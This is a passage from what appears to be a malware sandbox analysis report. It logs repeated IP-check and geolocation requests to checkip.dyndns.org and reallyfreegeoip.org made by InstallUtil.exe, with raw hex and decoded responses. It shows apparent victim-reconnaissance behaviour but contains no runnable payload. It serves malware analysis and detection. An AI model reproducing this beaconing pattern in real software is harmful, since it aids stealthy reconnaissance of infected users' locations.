                                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              X-Request-ID: 57a60bdf6c61206d7207e56e2d571ef9
                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              2192.168.2.449893193.122.130.0807968C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Jan 10, 2025 09:29:22.249783993 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Jan 10, 2025 09:29:22.717125893 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Fri, 10 Jan 2025 08:29:22 GMT
                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              X-Request-ID: 93bf70f77c3cd8128a34fd15202c7856
                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              3192.168.2.449901193.122.130.0807968C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Jan 10, 2025 09:29:23.344961882 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Jan 10, 2025 09:29:23.844273090 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Fri, 10 Jan 2025 08:29:23 GMT
                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              X-Request-ID: a280bc7f61095c1dfd306dc3e92ce763
                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              4192.168.2.449912193.122.130.0807968C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Jan 10, 2025 09:29:24.467472076 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Jan 10, 2025 09:29:24.924742937 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Fri, 10 Jan 2025 08:29:24 GMT
                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              X-Request-ID: 87f789c27942235ed1c42a9afc5549ef
                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              5192.168.2.449918193.122.130.0807968C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Jan 10, 2025 09:29:25.590614080 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Jan 10, 2025 09:29:26.044668913 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Fri, 10 Jan 2025 08:29:26 GMT
                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              X-Request-ID: 94f5e251077dc64c32a79815cd9d6cb7
                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              6192.168.2.449927193.122.130.0807968C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Jan 10, 2025 09:29:26.666353941 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Jan 10, 2025 09:29:27.178261995 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Fri, 10 Jan 2025 08:29:27 GMT
                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              X-Request-ID: 82662a81eec261f809f7a1cb3969ff01
                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              7192.168.2.449936193.122.130.0807968C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Jan 10, 2025 09:29:27.818296909 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Jan 10, 2025 09:29:28.276055098 CET321INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Fri, 10 Jan 2025 08:29:28 GMT
                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              X-Request-ID: 962ad32921e7667112cced4e851326e4
                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              0192.168.2.449877104.21.48.14437968C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-10 08:29:20 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              2025-01-10 08:29:20 UTC860INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Fri, 10 Jan 2025 08:29:20 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Age: 1812549
                                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zzHadVjRJ6dfj3a%2F2NHqxHoIah6y%2F8b%2FWK41cjeuV3mRklu2I0ckIZZDYyoe1%2FDKpyrj8iCdb8Cfw7j31I0iNiV%2BNaaDrSNnh%2BXL1N3pBXUBQd6e8rT854W3Og074DADoyBesqKy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8ffb4c7a5b748cda-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1931&min_rtt=1931&rtt_var=965&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4238&recv_bytes=699&delivery_rate=363953&cwnd=243&unsent_bytes=0&cid=8681a09a244e283e&ts=190&x=0"
                                                                                                                                                                                              2025-01-10 08:29:20 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              1192.168.2.449882104.21.48.14437968C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-10 08:29:21 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                                              2025-01-10 08:29:21 UTC861INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Fri, 10 Jan 2025 08:29:21 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Age: 1812550
                                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D7Siote%2FLgrxtZlEQ%2FxPDxKUGNnVIOoKVNHzLFpxZzrxDuw5IJ%2FDrkkyoN%2BjK1QcaSTvZhGhyJoAu7TBKk%2BFNHzyuz6dnqLnyo3%2Bjd9YB5ODVtZk0VqQVGRoVpTzK4Fko3HY99b7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8ffb4c7ec8ef8c15-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1780&min_rtt=1775&rtt_var=676&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1607044&cwnd=238&unsent_bytes=0&cid=b5f5086ad3b5166d&ts=133&x=0"
                                                                                                                                                                                              2025-01-10 08:29:21 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              2192.168.2.449888104.21.48.14437968C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-10 08:29:22 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              2025-01-10 08:29:22 UTC863INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Fri, 10 Jan 2025 08:29:22 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Age: 1812551
                                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DBbd%2Ftk0pff2r%2BMTopqiWyMSBbSTBrjlaE0ONIiVZ0RK%2FFU7IASoEKdPJ8lq5%2BNkNH4GpZtc7h5O%2FQWX52igcL7%2BTv%2BksxPeaxLdnXyPO8cvRhIWvVP8lfJu36qBbKhVw3sVLfV6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8ffb4c857cadc461-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1659&rtt_var=629&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1760096&cwnd=228&unsent_bytes=0&cid=c50c76d71eed2c00&ts=139&x=0"
                                                                                                                                                                                              2025-01-10 08:29:22 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              3192.168.2.449898104.21.48.14437968C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-10 08:29:23 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              2025-01-10 08:29:23 UTC855INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Fri, 10 Jan 2025 08:29:23 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Age: 1812552
                                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jAm6ZuBj1uJ2MR0c2lN%2B5WDNG2QSd2DCEThuVRdH3XFp4eY5SB3FXKpaiTQrZtkPaLhMfoDWz2T%2BwbMWlN4jl1v7upBKIMSqyW9Br2hZBFUrjAt5TWgzHsWaOo2JeFBf%2FuYwsvkx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8ffb4c8c7f4142e9-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1764&min_rtt=1764&rtt_var=661&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1655328&cwnd=240&unsent_bytes=0&cid=8cb8f69b41121566&ts=156&x=0"
                                                                                                                                                                                              2025-01-10 08:29:23 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              4192.168.2.449906104.21.48.14437968C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-10 08:29:24 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                                              2025-01-10 08:29:24 UTC851INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Fri, 10 Jan 2025 08:29:24 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Age: 1812553
                                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4423E0SF0HGy3CO6o1WBYriuA8SVLc3i2ggyATAVeP9XnjzTKd9fNAizeNOsvyoVq4yRHYwDzOWdxnlCLFvZ8MZ0rRTSKHHXTiTTyBrqsVL3wFLHmB%2BIEInpXiTHxqrRb1ksJ9fT"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8ffb4c938cd3c323-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1489&min_rtt=1479&rtt_var=575&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1869398&cwnd=214&unsent_bytes=0&cid=dea834735a5909bc&ts=154&x=0"
                                                                                                                                                                                              2025-01-10 08:29:24 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              5192.168.2.449915104.21.80.14437968C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-10 08:29:25 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                                              2025-01-10 08:29:25 UTC865INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Fri, 10 Jan 2025 08:29:25 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Age: 1812554
